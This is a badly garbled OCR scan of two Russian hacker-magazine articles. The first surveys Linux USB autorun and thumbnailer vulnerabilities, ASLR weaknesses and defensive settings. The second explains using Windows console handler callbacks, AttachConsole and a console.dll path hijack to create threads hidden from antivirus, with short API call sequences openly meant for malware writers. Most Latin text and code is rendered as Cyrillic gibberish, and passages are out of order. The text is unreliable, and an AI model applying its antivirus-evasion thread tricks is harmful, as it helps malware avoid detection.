рабочего стола, какОІМОМЕи КОЕ, предполагаютналичие специаль- 
ныхфайлов автозапуска на съемном накопителе: .аиіогип, аиіогип или 
аиіогип.зб. Если на флешке присутствуют два или все три из перечис- 
ленныхтипов файлов, то обрабатываться будеттолько один. Приоритет 
будет отдан файлу .аиіогип, а далее — в порядке, перечисленном выше. 
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После 40 960 запусков еѵіпсе-НіитЬпаіІег 
получился такой график распределения 
адресов загрузки ІіЬс 



Краткий ликбез 
по средствам безопасности 
в ІІЬипТи 



1. АррАгтог — модуль для ядра І_іпих, который 
реализует принудительный контроль доступа для 
приложений. С каждым приложением может быть 
ассоциирован специальный профиль, который 
ограничивает его телодвижения. В ІІЬипІи некоторые 
программы при инсталляции также устанавливают 
свой профиль для АррАгтог. Дополнительные профили 
содержатся в пакете аррагтог-ргобіез. Часть из них 
устанавливается по пути /изг/збаге/сіос/аррагтог-рго- 
біез/ехігаз, поэтому может потребоваться перенос в 
/еіс/аррагтог.сі. 

2. А5І.Р (Асісігезз Брасе І_ауои* Рапсіотігаііоп) — 

технология рандомизации адресного пространства. С ее 
помощью загрузчик ЕІ_Рдля каждого нового процесса 
будет задавать разные адреса стека, кучи, подгружаемых 
библиотек и так далее. Значение /ргос/зуз/кегпеі/ 
гапсІотІ2е_ѵа_5расе соответствует включенности (1 
или 2] или выключенное™ (0) А5І_Р. С 2005 года (ядро 
2.6.12] І_іпих включает в себя простую реализацию 
А5І_В. Различные патчи безопасности (РаХ, ЕхесБЫеШ 
и другие] реализуют более сложные и полные варианты 
АБИЕ. В дистрибутивах, содержащих в названии «НагсІ- 
епесі», а также в современных версиях ІІЬипІи сильные 
варианты включены по умолчанию. 

3. РІЕ (РозШоп Іпсіерепсіеп* ЕхесіЛаЫез) — специальные 
флаги сборки приложений «-{РІЕ — ріе». Собранные с 
такими флагами приложения могут использовать все 
преимущества А5ЕР и будут каждый раз загружаться 

по разным адресам. Не рекомендуется использовать 
на 32-битных системах, так как наблюдается весьма 
заметное снижение производительности (до 10%). 

4. ІЧХ бит (N 0 еХесиІе ВИ) — один бит в процессорном 
регистре, который обозначает, что находящимся 

в отдельных зонах памяти данным исполняться 
запрещено. Данная технология может работать только 
при соблюдении следующих условий: 

• используется процессор, поддерживающий 
технологию на аппаратном уровне (начиная с Іпіеі Реп- 
бит 4 серии бхх и всех модификаций АМР АіЫоп 64); 

• используется РАЕ или архитектура х86-64 (в этих 
режимах доступен бит запрета исполнения в таблице 
страниц]. 



По сути, это некий аналогаиіогип.іпі в ѴѴіпсІоѵѵз, только 
несколько урезанный в возможностях. Здесь можно только 
прописать путь к исполняемому файлу, но нельзя — сразу к 
нескольким, а также нельзя выходить за пределы файло- 
вой системы флешки с помощью ссылки на вышестоящий 
каталог. Крометого, для неисполняемыхфайлов (например, 



Количество опубликованных уязвимостей в Еѵіпсе заставляет 
задуматься 



документа рФ) тоже существует возможность автооткрытия. 
Нужно создать файл .аиіоореп или аиіоореп в корневой 
директории съемного устройства и прописать туда путьдо 
нужного файла, причем корнем является не корень систе- 
мы, а корень съемного устройства. Правда, втомже Ыаиіііиз 
эта функциональность пока (намеренно?) не реализована. 
Единственная омрачающая картину автозапуска вещь- 
пользователю необходимо подтвердить это действие. Но 
такой ли это минус? Слепая уверенность линуксоида в своей 
безопасности от мал вари может сыграть с ним злую шутку. 

Копаем глубже 

Надо признать, что фокусами с автозапуском нынче мало 
кого удивишь, поэтому взглянем на предметную область не- 
сколько шире. После втыкания флешки (или любого другого 
устройства) исполняется большое количество кода: 

• модули подсистем 115В., еБАТА., Рігеілііге., РСМСІА; 

• модули файловой системы режима ядра (ех1:3 ^ ех1:4 

и другие); 

• модули файловой системы пользовательского режима 

(п-ы=5-зе) ; 

• библиотеки создания эскизов (через файловый 

менеджер) . 

Ошибки могут существовать на любом из этихуровней. 
Например, в 2009 годубыл найден багв драйвере ѴоІР 
телефона АиегзѵѵаИ (СѴЕ-2009-4067). Он заключался в 
неправильной обработке ОІБВ-дескрипторов и приво- 
дил к классическому переполнению буфера. В результате 
эксплуатации этой бреши атакующий мог выполнить 
произвольный код на уровне ядра. Для болееудобного 
поиска ошибокв ІІБВ-драйверахТобиас Мюллер создал 
фаззер, основанный на ОЕМІІ и позволяющий эмулировать 
ІІБВ-устройства. В конце 2009 была исправлена серьезная 
уязвимость в модуле файловой системы ехі4, в функции 
ехі4_сІесосІе_еггог(), которая приводила к разыменованию 
ІЛШЕ-указателя и выполнению произвольного кода при 
монтировании специально скомпонованного образа ФС. 
Уязвимости в драйверах файловых систем используются 
при помощи специально сформированного образа этой 
файловой системы, залитого на флешку. Успешно про- 
эксплуатированная уязвимость даетата кующему полный 
рутовый доступ к системе, таккакдрайверы файловых 
систем исполняются в режиме ядра. Эксплуатация уязви- 
мостей в драйверах файловой системы пользовательского 
режима (через БІІ8Е) дает нам возможность исполнять код 
спривилегиямитого пользователя, отчьего имени был под- 
монтирован раздел. 




НТТР://ѴѴѴШ 
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> Ііпкз 

• Спецификации, 
в которых кто-то 
додумался описать 
автозапуск с флешек: 
доо.д 1/2ѵѵІ ІА : 

• база уязвимостей, 
на которую чаще 
всего ссылаются экс- 
перты: сѵе.тііге.огд/ 
сѵе/сѵе.ЫтІ : 

• видеозапись вы- 
ступления Джона 
Ларимера: уоиІиЬе. 
сот/ѵѵа1:сЬ?ѵ= 
оѵіУВа 1 ЕНт4 : 

• полный список 
средств защиты, ис- 
пользуемых в ІІЬипіи : 
ѵѵікі.иЬипіи.сот/ 
Бесигііу/Ееаіигез . 




> СІѴСІ 

На прилагаемом 
к журналу ОѴО ты 
найдешь видеозапись 
и слайды с выступле- 
ния Джона Ларимера 
на конференции 
БЬтооСоп 201 1 , 
которое, собственно, 
и подняло всю эту 
панику. 
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Ыаиіііиз как бы говорит, что ответственности за наши Отключаем автоматический просмотр содержимого 
действия не несет свежеподключенных разделов 



Как искать уязвимости в системных драйверах? Здесь существует не- 
сколько путей: 

1. Ручной анализ кода. Особое внимание следуетуделятьтому, как пар- 
сятся структуры файловой системы. 

2 . Автоматический анализ кода при помощи специализированного со- 
фта (Ііпі, сіапд зіаіісапаіугег и другие). 

3. Фаззинг. В Линуксе любое блочное устройство (втом числе файл) 
можетбытьсмонтировано как раздел. Таким образом, можнолегко на- 
писать программу, модифицирующую файл, смонтировать его, провести 
некоторые операции, а потом размонтировать и повторить процедуру 
заново. Модифицируя файл не абы как, а сучетом структур файловой си- 
стемы, можно быстрее прийти куспеху (так называемый зтагііиггіпд). 

Наследник АсІоЬе АсгоЬаі Реасіег 

Еѵіпсе — весьма распространенный просмотрщик РОЕ- документов. 
Также поддерживает та кие форматы, какРозіЗсгірІ, ТІРР, йѴІ, Он 

является стандартным компонентом рабочей среды 6Ы0МЕ. Зайдя 
на сайтСоттоп Ѵиіпегабіііііезапсі Ехрозигез, можноувидеть, что для 
Еѵіпсе открыто девять уязвимостей, причем четыре из них — достаточно 
новые и датируются июлем 2010 года. Одна изэтихуязвимостей (СѴЕ- 
2010-2640) была продемонстрирована Джоном Ларимером, имжебыл 
описан процесс создания эксплойта под нее, который исполнял про- 
извольный код в системе. В данном случае была продемонстрирована 
возможность«отпирания»залоченной скринсейвером системы ІІЬипІи 
10.10 после простого втыкания флешки (без ведома пользователя и 
системы исполнялся находившийся на флешке простой скрипт кі11.5Ь с 
командой «кіІМІдпоте-зсгеепзаѵег»). Самауязвимостьзаключается 
в неправильной обработке шрифтов в ОѴІ-файлах. В этих файлах могут 
подключаться внешние шрифты, путь до которых задается в абсолютном 
виде (/тесІіа/ЫЫЫ). Вообще говоря, эта уязвимость никоим образом не 
связана с флешками и может использоваться сама по себе, просто дур- 
ная привычка Ыаиіііиз открывать окна с новыми подмонтированными 
системами пришлась очень кстати. 

Ыаиіііиз под микроскопом 

6Ы0МЕ Ыаиіііиз — файловый менеджер, который используется поумол- 
чанию в дистрибутивах ІІЬипІи, а также в среде рабочего стола 6Ы0МЕ. 
Он поддерживает большинство спецификаций ігеесіезкіор.огд и авто- 
матически монтирует известные ему файловые системы на ІІЗВ-дисках 
поумолчанию. Чтобы получать информацию о новых подключенных 
съемных накопителях, Ыаиіііиз использует 0ѴР5 — виртуальную файло- 
вую систему, которая дает возможность монтировать разделы без руто- 
вых привилегий. Смонтированный раздел находится по пути/тебіа/ 
ЫЫЫ, где ЫЫЫ — название раздела. Также Ыаиіііиз автоматически 
открываетокно с содержимым смонтированного раздела и генериру- 



ет эскизы для каждого файла, находящегося в корневой директории 
раздела. Причем это происходит даже при работающем скринсейвере 
и заблокированной системе! Ыаиіііиз умеет генерировать эскизы для 
изображений, видеофайлов, текстовых документов и некоторых других 
файлов. Иконки для изображений генерируются с помощью стандарт- 
ной гномьей библиотеки ОбкРіхВиІ, которая в своей работе вызывает 
функции из других библиотек для различных изображений, таких как 
ІіЬрпд, ІіЫіІІ, ІіЬ)ред. Во всехтрех библиотеках существуют общеизвест- 
ныеуязвимости. В начале 201 1 года была опубликована уязвимость в 
библиотеке ІіЬрпд версии < 1 .5.0 (СѴЕ-201 1 -0408), которая присутствует в 
функциях рпд_бо_ехрапб_ра1е11е() и рпд_бо_гдЬ_1о_дгау(). Их реали- 
зацию можно найти в исходном файле рпдгігап.с. С помощью специ- 
ально сформированных РЫО-, МЫО- или бЫО-файлов можно аварийно 
завершить работу использующего эту библиотеку приложения и при 
некоторыхусловиях выполнить произвольный код на целевой системе, 
что и было продемонстрировано Джоном Ларимером на конференции 
ЗЬтооСоп. Ксожалению, РоС-эксплойтпока не представлен широкой 
общественности, зато давно доступен закрывающий этотбагапдейт 
библиотеки до версии 1 .5.1 .Летом 2010 года было обнаружено пере- 
полнение буфера в библиотеке иЬТІРРЗ.х, которое приводит к выпол- 
нению произвольного кода при попытке обработки ТІРР-изображения 
со специально оформленным блоком тэгов Ви^есЮізІапсе. Проблема 
устранена в версии 3.9.4. В ноябре прошлого года была найденауязви- 
мость в библиотеке для рендеринга шрифтов РгееТуре версии < 2.4.3, 
позволяющая выполнить произвольный код в системе при обработке 
специально сформированного шрифта ТшеТуре ОХ. Баг в виде перепол- 
нения буфера существовал в функции 11_ѵаг_геабраскеброіпІз(). 

Все эти и многие другие нераскрытыеуязвимости свидетельствуют о 
том, что нынешняя реализация библиотекпод Ыпихдалека от совер- 
шенства в плане безопасности. 

Для формирования эскизов другихфайлов используются сторонние 
утилиты: 

• еѵіпсе-іЬитЬпаіІег — для документов рсІІ; 

• ІоІет-ѵібео-іЬитЬпаіІег — для видео- и аудиофайлов; 

• дпоте-іЬитЬпаіІ-ІопІ — для файлов со шрифтами. 

У всех этих утилит схожий синтаксис — например, вызов еѵіпсе- 
ІбитЬпаіІегвыглядиттак: 

$ еѵіпсе-1:ІіитЬпаі1ег -5 100 /Ьоте/изег/сіос . рсі-р \ 
/Ьоте/изег/ІіІіитЬ . рп§ 

Здесь аргумент'-з' задает размер миниатюры в пикселях по горизон- 
тали, следующий параметр — исходный РОР-документ, последний 
параметр — файл с получившейся миниатюрой. Таким образом Ыаиіііиз 
за пускает соответствующую утилиту для каждого файла в просматри- 
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Отключаем создание эскизов при просмотре содержи- 
мого файловой системы 

ваемой директории. Посмотреть список используемых построителей 
эскизов и ассоциированных с ними типов файлов можно так: 

$ §соітР1:оо1 -К /сІе5к1:ор/§поте/1:ІіитЬпаі1ег5 

Стоитзаметить, что уязвимости в генераторах эскизов могут исполь- 
зоваться и безучастия флешки: достаточно скачать файл из интер- 
нета и просмотреть содержимое соответствующей папки в файловом 
менеджере. Что примечательно, не все генераторы эскизов защищены 
АррАгтогв ІІЬипІи 10. 10, среди незащищенных — Іоіет-ѵісіео- 
іНитЬпаіІеги дпоте-іЬитЬпаіНЪпІ. Будем надеяться, в будущих 
релизах ІІЬипІи это исправят. Тем не менее, вышеописанныеутилиты 
рано или поздно попадут под разнос хакеров, что, судя по последним 
событиям, уже начинается. Но в той же ІІЬипІи существует множество 
встроенных средств защиты, призванных обезопасить пользователей от 
всехнапастей. Посмотрим, вездели они смогутпомочь. 

Обход встроенных 
средств защиты 

Дистрибутив ІІЬипІи по праву признан одним из самых защищенных: тут 
тебе и АррАгтог, и А5І_Н, и РІЕ, и использование ЫХ-бита. Последний 
уже считается неэффективным ввиду появления та кихтехниката к, как 
возврат в библиотеку (геі21іЬ) и возвратно-ориентированное програм- 
мирование (РОР). В своем выступлении на последней конференции 
ЭЬтооСоп 201 1 Джон Лаример показал слабости механизма А8БР/РІЕ в 
32-битном Ыпих. Он проанализировал адреса, по которым загружается 
библиотека ІіЬс (но это справедливо и для любой другой), и пришел к вы- 
воду, что возможно всего около 3 000 вариантов, а в определенныхусло- 
виях — еще меньше. Причем вероятности нахождения библиотеки по 
одному из этих адресов не равны, график распределения вероятностей 
можешь посмотреть на картинке (по горизонтальной шкале размести- 
лисьадреса, а по вертикальной — количество попаданий в конкретный 
адрес). Таким образом, можно просто подобрать адрес нужной библио- 
теки — например, с помощью создания множества рсІПдокументов, 
эксплуатирующих баг в еѵіпсе-іЬитЬпаіІег. Это становится возможным, 
так как ЫаіЛіІиз запускает для каждого файла отдельный процесс еѵіпсе- 
ІбитЬпаіІег. Другой интересный и уже почти стандартный механизм 
защиты — АррАгтог— на самом деле защищаетлишь настолько, 
насколько способны его профили, расположенные в/еіс/аррагтог.сі. 
Например, в ІІЬипІи 1 0.1 0 профильдля еѵіпсе-ІбитЬпаіІег позволяет 
запись в -/.сопбд/аиіозіагі — место, которое может быть использовано 
вирусописателями для автоматической загрузки ихтворений (или даже 
произвольных скриптов) при входе пользователя в систему. От не- 
которых вещей АррАгтог не способен защитить в принципе, поскольку 




Создание эскизов в Ыаиіііиз включено по умолчанию 

такая защита может нарушить стабильность работы системы: 

• вызовы библиотеки X1 1 (может быть нарушен доступ ксети); 

• завершение процесса скринсейвера, перехват нажатых клавиш, 
эмуляция нажатий клавиш итакдалее. 

Принимаем меры 

Защититься отвсехугроз нам в любом случае никогда неудастся, но 
могу дать ряд полезных советов, которые существенно снизят риски: 

1. Своевременно ставьобновления системы. В Ыпих патчи выходят 
гораздо оперативней, чем в ѴѴіпсІоѵѵз, где публичные баги могут суще- 
ствовать месяцами. Этим ты обезопасишь себя хотя бы от известных 
уязвимостей. 

2. Отключи автомонтирование съемных накопителей или (более простой 
вариант) открытие окна ЫаіЛіІиз при автомонтировании. Для этого в 
ЫаиШиз необходимо зайти в меню «Есііі; -> Рге1югепсе5-> Месііа» и снять 
галку с опции «Вгоѵѵзе тебіаѵѵЬеп іпзегіесі». 

3. Отключи генерацию эскизов в своем файловом менеджере. Это не 
обязательно должен быть Ыаиіііиз, все графические файловые менед- 
жеры используют для этого сходные компоненты. В Ыаибіиз создание 
эскизов отключается в меню «Ебіі -> Ргеіюгепсез -> Ргеѵіеѵѵ». 

4. Используй АррАгтогс расширенным набором профилей, которые 
можно найти в интернете. Особое внимание следует удел ять всяким 
проприетарным приложениямтипа Экуре, поскольку патчи ктаким при- 
ложениям обычно выходятнетакбыстро, как хотелось бы. 

5. Поставь патч к ядру РаХ, который не позволяет коду исполняться в 
стеке, а также не допускает возможности записи в область кода про- 
граммы —таким образом предотвращается эксплуатация уязвимостей 
переполнения буфера. Ктомуже РаХувеличивает количество битэнтро- 
пии для А5І_Р, делая перебор адресов загрузки библиотек практически 
невозможным. 

6. Используй 64-битное ядро, в нем А5І_Р лишен слабостей, описанных 
выше. Крометого, переход на 64 разряда даст твоей системе прирост 
производительности, во всех современных процессорах поддержка 
набора команд х86-64 имеется. 

7. С осторожностью используй дистрибутив ІІЬипІи (а лучше вообще 
не используй), таккакон самый распространенный среди линуксов, и 
новые зловреды, скорее всего, будут затачиваться под него. 

Заключение 

Каквидишь, наделе Ыпихоказался нетаким безопасным, каконем при- 
выкли думать, особенно это касается настольных и ориентированных 
на пользователя ди стр и бути во в тип а ІІЬипІи. Другое дело, что ими пока 
не особо интересуются в и русо писатели: извлечь материальную выгоду 
достаточно затруднительно из-за небольшого распространения Ыпих 
по сравнению с ѴѴіпсІоѵѵз. цс 
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I Александр Эккерт (зіаппіс.тапіадтаіі.сот) 



РАСПИЛ 
КОНСОЛИ 



Выкатываем рояли на пути следования 
проактивных защит 

о Ню может сделать с виндовой консолью продвинутый 
пользователь? Наверное, случайно отформатировать свой винт, 
глубоко расстроиться и позвать на помощь грамотного соседа. 
Настоящий же хакер поставит ее себе на службу. Так, что она 
позволит ему достичь заветной цели - невидимости для 
антивирусов. Да и не только... 



Введение 

Стандартная консоль ѴѴіпсІоѵѵз (да -да, та самая, которая появля- 
ется, скажем, при вызове сппсі.ехе, вечный объект издевательств 
линуксоидов) — казалось бы, что может быть скучнее? Но поспешу 
тебя уверить: консоль в ѴѴі п сіоѵѵз — крайне занимательная и ин- 
тересная штука, покопаться в ее внутренностях будет нелишним. 
Определимся сразу (а то некоторые могут и не понять, о чем речь) 
— нас в данной статье будет интересовать не доступ к М5-005 или 
хитрости командной строки в ѴѴіпсіоѵѵб. Речь пойдет о том, как во- 
обще существуетто самое черное окно. 

Консоль — целиком и полностью детище С5Р55, а ][уже неодно- 
кратно писал об этой хитрой подсистеме ѴѴіпсІоѵѵз. 

Некоторым читателям может показаться, что все это хоть и по- 



знавательно, но довольно скучно с точки зрения ха ка. Однако 
советую дочитать статью до конца, там определенно есть над чем 
задуматься. 

Взаимодействие между 
процессами 

ОС ѴѴіпсІоѵѵз предоставляет разработчику богатый набор инстру- 
ментов для обеспечения взаимодействия между процессами 
— это клавиатура, файлы, пайпы (именованные каналы), раз- 
деляемая память, ЬРО/Р РС , СОМ, сокеты и еще кое-что. Все они 
более-менее хорошо документированы, останавливаться на них 
смысла нет (для общего развития — ги.ѵѵікіресІіа.огд/ѵѵікі/Межпро- 
цессное взаимодействие ). Тем не менее, мало кто задумывался, 



► юб 
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что консоль обладаеттаким волшебным свойством, 
как обеспечение взаимодействия между процесса- 
ми. И это свойство досталось консоли от подсистемы 
С8Р88. 

Как именно консоль может оказаться в буфере между 
двумя процессами? Оказывается, оченьлегко. Напри- 
мер, некая программа создает новую консоль вызовом 
АРІ-функции АНосСопзоІе. А вторая программа (читай 
— процесс) вызывает АиасЬСопзоІе итаким образом 
присоединяется к «текстовому интерфейсу» консоли. 
Что получается: два объекта-процесса владеюттре- 
тьим объектом, принадлежащим внешнему процессу 
сзгББ.ехе. Далее, получив доступ к консоли, первые 
два «посторонних» процесса могутлегко менять пара- 
метры консоли — например, позицию курсора, размер 
окна консоли или его (окна) название. Все это проде- 
лывается вызовом хорошо документированных функ- 
ций ЗеіСопБОІеСигБогІпЬ, ЗеіСопБОІеСигБогРоБІІіоп, 
ЗеіСопБОІеТіНе (или их беі-эквивалентами). 

Из вышесказанного наблюдательный читатель может 
сделать вывод, что через сзгББ.ехе можно устроить 
обмен информацией для двух или нескольких про- 
цессов. Каким образом? Да через титл (название окна) 
консоли — он за один раз может вместить 65535 байт, 
при этом потенциальная скорость передачи данных в 
таком случае будет весьма и весьма высока. Правда, 
при этом придется иметь ввиду, что единственный тип 
данных, который подходит для обмена информацией 
между двумя процессами посредством С8Р88 — это 
текстовые строки. Поэтому разработчику придется ис- 
пользовать дополнительные приемы, чтобы передавать 
таким образом бинарные данные. 

СТВІ.+С —знакомая 
ситуация? 

Ты никогда не задумывался, как консоль реагирует 
на комбинацию СТРБ+С, которая отменяеттекущее 
исполнение потока? Вообще консоль реагирует на 
пять СТРБ+... событий. Первое — это СТРІ__С_ЕѴЕІ\ІТ, 
сигнализирующее о нажатии клавиш СТРБ+С. Второе — 
СТРБ_ВРЕАК_ЕѴЕІ\ІТ, которое используется дебаггера- 
ми. Третье — СТРБ_СБ08Е_ЕѴЕІ\ІТ, сообщает всем про- 
цессам, совместно использующим консоль, что лавочка 
прикрылась. СТРБ_БОѲОЕЕ_ЕѴЕІ\ІТ посылается всем 
процессам, если пользователь выходит из системы. Ну 
и наконец, СТРБ_8НБІТВ0ѴѴІ\І_ЕѴЕМТ, которое говорит, 
что система выключается. Первые два сигнала могут 
быть получены при нажатии известных клавиш на кла- 
виатуре или программным способом — путем вызова 
АРІ ОепегаІеСопБОІеСігІЕѵепТ 

Крайне интересен механизм, который обеспечивает 
обработку всех этих СТРІ_-событий, но от знания о су- 
ществовании сигнала не будет пользы, если программа 
не в состоянии как-то эти самые сигналы обрабаты- 
вать. И тут на помощь приходит функция кегпе132. 
сІШЗеіСопБОІеСігІНапсІІег, вызовом которой можно 
установить обработчик СТР І_- сигналов. Нотам не все 
так просто. 

Для полного прояснения картины нам нужно понять 
следующее. В контексте какого потока происходит 
исполнение зарегистрированного обработчика? 
Возможно, это первоначальный поток процесса, или 
вновь созданный, или вообще появившийся фигзнает 
откуда? Для того, чтобы ответить на возникающие 
вопросы, отмотаем пленку назад, на момент создания 
консоли, и посмотрим, что происходит при вызове 
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Консоль может быть даже такой 



АНосСопБОІе. Вызов этой функции форвардом приво- 
дит к вызову ѵѵіпБгѵІЗгѵАНосСопБОІе. Этой функции, 
в свою очередь, передается в качестве параметров 
два указателя на функции кегпе132!СМРоіЛіпе и 
кегпе132!РгорРоіЛіпе (после чего следует вызов 
СБгСІіепіСаІІЭегѵег с внутренним кодом операции 
0x20224). А потом происходит самое интересное — 
при получении какого-либо СТРБ-сигнала С8Р88 
создает новый (!) поток в контексте приаттаченного 
к консоли процесса: ѵѵіпБгѵІРгосеББСігІЕѵепІБ -> 
ѵѵіпБгѵІСгеаІеСігІТбгеаб -> ѵѵіпБгѵИпІегпаІСгеаІеСаІІЬа 
скТЬгеасІ -> кегпе132!СгеаІеРетоІеТЬгеасБ 
Новый поток будет и меть точкой входа тотсамый указа- 
тель на СМРоиІіпе. 

Хакерские вкусности 

Описанный механизм, когда С8Р88 рулит обработчи- 
ками консоли, можно использовать в очень популярной 
среди разработчиков малвари задаче — каксоздать, 
скрыть или замаскировать новый поток незаметно 
для проактивок или аверов. В честных программах 
для создания новых потоков обычно используют 
известные функции СгеаІеТЬ геасі (Ех) . Но если ты 
хочешь скрыть этот факт, можно поступить следующим 
образом: создаем новую консоль, регистрируем один 
или несколько обработчиков сигналов, после чего про- 
граммно генерируем сигналы Сігі+С или СМ+Вгеак, 
чтобы создать новый поток. Благодаря АРІ-интерфейсу 
любая программа легко может регистрировать или 
удалять обработчики сигналов. Таким образом любой 
процесс получает недокументированную возможность 
подсистемы С8Р88, равную по силе прямому вызову 
СгеаІеТбгеасЦЕх). 

Схематично создание потока описанным методом будет 
выглядеть примерно так: 




НТТР://ѴШѴѴ 



1 Г 

> Ііпкз 

Неплохо написано о 
межпроцессном взаи- 
модействии в М80ІЧ: 
ЬНрУ/доо.дІ/ЬТѵѵЬг . 

И вообще, почаще за- 
глядывай в М80ІЧ! 




Хочешь стать 
сильным системным 
кодером? Без умения 
пользоваться ЮА 
Рго и ѴѴіпОЬд твои 
способности будут 
оцениваться в два 
раза дешевле! 



А11осСоп5о1е() ; 

5е1:Соп5о1еС1:г1Напс11ег ( 1:ИпеасІНапсІ1ег1„ТКІІЕ ); 
5е1:Соп5о1еС1:г1Напс11ег( 1:ИпеасІНапсІ1ег2„ТКІІЕ ); 
Сепега1:еСоп501еС1:г1Еѵеп1:( СТКІ__С_ЕѴЕІ\ІТ., 
Се1:СиггеітІ:Рпосе55ІсІ( ) ); 

// Здесь будет выполнен код 
1:бгеасІНапсІ1ег2(СТКІ__С_ЕѴЕІ\ІТ) 

// Здесь будет выполнен код 
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*ІігеагіНапсПег1(СТКІ__С_ЕѴЕІ\ІТ) 

5е1:Соп50ІеС1:г1НапсІ1ег( ІіМгеасІНапсІІегІ^ РАІ_5Е ); 
5е1:Соп5о1еС1:г1Напс11ег( ІіІ'ігеасІНапсІІегЗ, ТКІІЕ ); 
Сепега1:еСоп50ІеС1:г1Еѵеп1:(СТКІ_ВКЕАК_ЕѴЕІ\ІТ, 
Се1:Сиггеп1:Ргосе5 5ІсІ( ) ) ; 

// Здесь будет выполнен код 
// *бгеасІНапсПегЗ(СТКІ__ВКЕАК_ЕѴЕІ\ІТ) 

// Здесь будет выполнен код 
// 1:Іігеас1НапсПег2(СТКІ_ВКЕАК_ЕѴЕІ\ІТ) 

РгееСоп5о1е( ) ; 

Здорово, правда? И ни один аверне узнает о создании новых по- 
токов. 

Но это только начало :). 

Какуже было сказано выше, благодаря АРІ-функции АиасЬСопзоІе 
теперь любая программа может получить доступ ктекстовому 
интерфейсу консоли. И несмотря на то, что в каждый момент 
времени только один процесс может быть «владельцем» консоли, 
все остальные процессы могут полностью контролировать само 
окно и использовать все функции для управления консолью. При 
этом такие процессы нетолько могутуправлять консолью, им еще 
и уведомления о событиях консоли будут приходить. Таким вот 
нехитрым образом делаем вывод — использование АРІ-функции 
АіТасЬСопзоІе в конечном итоге может служить своеобразной аль- 
тернативой СгеаІеНетоІеТЬгеасІ! 

Смотрим, как это делается: 

• запускаем процесс А; 

• запускаем процесс Б; 

• процесс А вызывает А11осСоп5о1е( ) ; 

• процесс Б вызывает А1:1:асбСоп5о1е( ) ; 

• процесс Б устанавливает обработчик событий 
5е1:Соп50ІеС1:г1НапсІ1ег( 1:ІіпеасІНапсІ1ег^ ТКІІЕ ); 

• процесс А генерирует событие 
Сепега1:еСоп50ІеС1:г1Еѵеп1:(СТКІ_ВКЕАК_ЕѴЕІ\ІТ^ 

СеТСи ггепТРгосезБ ІсІ() ) ; 

• в адресном пространстве процесса «Б» в новом потоке 
запускается 1:ІігеасІНапсІ1ег . 

Для этого примера стоит отметить одну особенность: в описанном 
случае сигнал СТНІ__С_ЕѴЕІ\ІТ работать не будет, нужно исполь- 
зовать СТРІ__ВРЕАК_ЕѴЕМТ. Кроме того, вызывающий функции 
ОепегаІеСопзоІеСітІЕѵепІ в состоянии лишь инициировать 
создание потоков, но он не сможет проконтролировать результат их 
выполнения. 

Внимательный читатель может вспомнить, что при вызове 
основной функции создания консоли ѵѵіпзгѵіЭгѵАІІосСопзоІе ей 
передаются два указателя на функции СігІРоиІіпе и РгорРоиІіпе. 

С СігІРоиІіпе мы вроде бы разобрались, но причем здесь 
РгорРоиІіпе? Все просто — РгорРоиІіпе отвечаетза обработку 
свойств окна. Когда юзер пытается изменить свойства окна консо- 
ли, он выбирает соответствующее меню, устанавливает выбранную 
опцию и подтверждает выбранные изменения. Вроде бы, ничего 
сложного, однако в недрах системы снова разворачиваются очень 
занимательные события. 

В тот самый момент, когда пользователь кликает на меню «Свой- 
ства» консольного окна, одна из функций управления окна (а 
именно ѵѵіпзгѵІСопзоІеѴѴіпбоѵѵРгос) получает оконное сообщение с 
такими параметрами: 

• иМв§ = ММ_5У5СОММА1\Ю 

• ыРагат = 0хРРР7 

• ІРагат = ипсіебпесі 

Что происходит дальше? Запускается механизм проецирования 
файла в память: вызываются функции КІіСгеаІеЭесІіоп, 



затем КІіМарѴіеѵѵОІЭесІіоп, затем проекция заполняется 
текущими установками окна консоли. Далее следует вызов 
МШптарѴіеѵѵОІЭесІіоп, после чего вызывается І\ІШирІісаІеОЬ)есІ, 
который создает дубликатхэндла секции (в контексте 
процесса владельца консоли!) и лишьзатем вызывается 
СгеаІеРетоІеТЬгеасІ с переданными параметрами установленной 
РгорРоиІіпе и дубликатом хэндла секции. 

Замечу, что РгорегІіезОІдЭЬоѵѵ не ожидает окончания работы по- 
тока, она посредством ѵѵіпзгѵіСопзоІеѴѴіпсІоѵѵРгос просто создает 
поток и возвращает управления диспетчеру оконных сообщений. 
Удивительный факт — это совсем не означает, что обновленные 
свойства окна устанавливаются каким-то другим способом, нежели 
просто функцией РгорегІіезОІдЭЬоѵѵ. 

Что же происходит на самом деле? Итак, смотрим: сама по себе 
функция не делает каких-либо занимательных вещей, зато она 
подгружает одну библиотеку в адресное пространство про- 
цесса, при этом загрузка 0І_І_ проходиттривиально, вызовом 
І_оасИ_іЬгагуѴѴ, которая не (!) проверяет, что именно она грузит, а 
лишь подгружает библиотеку по захардкоденному (ну и словечко 
ты изобрел! - прим. Лозовского) пути. Загружаемая библиотека 
сопзоІе.сШ и осуществляет веете операции, которые мы видим на 
экране при вызове меню «Настройки» консоли. 

Мастер-класс для начинающих 

Таким образом получается, что правильно реализовав свою функ- 
цию вместо захардкоденной кегпе132!РгорРоиІіпе, мы с легкостью 
сможем реализовать функционал АРІ-функции СгеаІеТЬгеасІ(Ех). 
Это можно сделать путем перехвата и модификации функций 
АиосСопзоІе/АіІасЬСопзоІе или же, для совсем безбашенных, 
путем собственной реализации функции АНосСопзоІеО. 

Кстати, чтобы заставить консоль создать новый поток, достаточно 
послать окну сообщение со следующими параметрами: 

БепсІМезза^е (бСопзоІе, ЫМ_5Ѵ5СОММАІ\Ю, 0хРРР7, 0) 

Здесь ЬСопзоІе является обычным НѴѴІ\Ю, полученным вызовом 
беіСопзоІеНапсИеП. 

Что получим в итоге? Чтобы создать новый поток в случае вызова 
кегпе132!СігІРоиІіпе путем множества сложныхтелодвижений, 
можно просто подсуетиться, подменив кегпе132!РгорРоиІіпе 
своей, не совсем честной функцией. Это, как правило, приведет 
к созданию нового, «невидимого» для глаз а веров и проактиво к 
потока. 

И напоследок поговорим о вышеупомянутой сопзоІе.сШ, а точ- 
нее — отом, какее можно использовать в наших грязных целях. В 
ѴѴіпбоѵѵз ХР загрузка сопзоІе.сШ осуществлялась с жуткой ошибкой 
— не указывался путь, откуда грузить эту библиотеку, что давало 
взломщикам возможность ее подменить. Начиная с ѴѴіпбоѵѵз Ѵізіа 
положение дел лучше не стало — там добавили относительный путь 
к этой библиотеке. С учетом того алгоритма, который до сих пор 
используется в ѴѴіпсІоѵѵз для поиска библиотек, опять-таки суще- 
ствуетхорошая возможность ее подмены. Перед тем какзагрузить 
сопзоІе.сШ из \зуз1ет32\, ее сначала будут искать в папке уста- 
новки программы. Нои это еще не все. Весь описанный механизм 
